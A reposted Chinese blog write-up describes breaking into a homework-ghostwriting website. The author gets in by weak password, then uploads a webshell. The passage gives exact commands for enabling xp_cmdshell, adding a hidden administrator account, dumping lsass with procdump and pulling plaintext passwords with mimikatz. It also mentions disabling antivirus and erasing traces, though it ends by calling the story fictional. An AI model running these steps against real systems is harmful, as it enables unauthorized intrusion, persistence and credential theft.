1. 威客安全首页
  2. 安全资讯

记一次有趣的渗透测试

请点击上面 记一次有趣的渗透测试 一键关注!

内容来源:先知社区

记一次有趣的渗透测试


别人都放假了我们却还在小学期中,这两天女朋友老是抱怨小学期作业难做,然后她今天发现淘宝上有人花钱代做,遂发来网址让我看看

记一次有趣的渗透测试


咱也不知道,咱也不敢问

然后反手一个弱口令进了后台

其实这个站有注入,不过既然进了后台,那肯定要去shell啊,找了个学生的账号登陆进入发现了头像上传点可以任意文件上传

直接传了个大马,执行命令看下权限

记一次有趣的渗透测试


这权限也太小了吧,先来提权,看下补丁

记一次有趣的渗透测试


这还不随便打了,传了几个提权exe之后发现都执行不了,可能被杀软杀掉了,然后尝试抓hash

记一次有趣的渗透测试


看来只有pwdump7.exe没被杀了,但是权限不够

现在我们的权限能去读一些文件,去翻一翻sqlserver的密码,尝试sqlserver来提权

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;

exec sp_configure 'xp_cmdshell',1;reconfigure;

记一次有趣的渗透测试


成了,有权限了,尝试加个管理员?

记一次有趣的渗透测试Wtm,加不上啊,杀软拦了,再次使用pwdump7来抓hash

记一次有趣的渗透测试


本来就开着3389,直接连上去

记一次有趣的渗透测试


Wtm开着管家和金山,传的东西都被拦截了,关掉杀软,先加个隐藏用户

net user test$ pinohd123. /add

net localgroup administrators test$ add


这里lz1y告诉我也可以procdump去搞,procdump是官方的工具,不会被杀软杀

execmaster..xp_cmdshell ‘xxxximagesbuttonProcdump.exe -accepteula -ma lsass.exe-o xxx.dmp’


记一次有趣的渗透测试


把2.dmp存到本来来配合mimikatz

mimikatz.exe
sekurlsa::minidump 2.dmp

sekurlsa::logonPasswords full

记一次有趣的渗透测试

记一次有趣的渗透测试


同样拿到明文。


奈何没有域,擦了脚印溜了。


好了 以上问题纯属虚构,环境也是自己搭的。(告辞)

记一次有趣的渗透测试

「天億网络安全」 知识星球 一个网络安全学习的星球!星球主要分享、整理、原创编辑等网络安全相关学习资料,一个真实有料的网络安全学习平台,大家共同学习、共同进步!

知识星球定价:199元/年,(服务时间为一年,自加入日期顺延一年)。

如何加入:扫描下方二维码,扫码付费即可加入。

加入知识星球的同学,请加我微信,拉您进VIP交流群!

记一次有趣的渗透测试

加入群聊

为了【天億网络安全】微信群管理,想进群的朋友先加我好友,我拉你们进群,微信二维码如下:

记一次有趣的渗透测试

—THE END—

朋友都在看

▶️公安部 马力 | 网络安全等级保护2.0主要标准介绍

▶️干货 | 等保2.0新标准介绍

▶️重磅 |等保2.0正式发布,2019年12月1日实施

▶️等保2.0通用部分 | 安全区域边界(三级)测评指导书

天億网络安全

【欢迎收藏分享到朋友圈,让更多朋友了解网络安全,分享也是一种美德!】

记一次有趣的渗透测试

↑↑↑长按图片识别二维码关註↑↑↑


欢迎扫描关注【天億网络安全】公众号,及时了解更多网络安全知识

原文始发于微信公众号(天億网络安全):记一次有趣的渗透测试

本文转为转载文章,本文观点不代表威客安全立场。

发表评论

登录后才能评论

联系我们

4006-119-120

在线咨询:点击这里给我发消息

邮件:public@jinlongsec.com

工作时间:周一至周五,9:30-18:30,节假日休息

X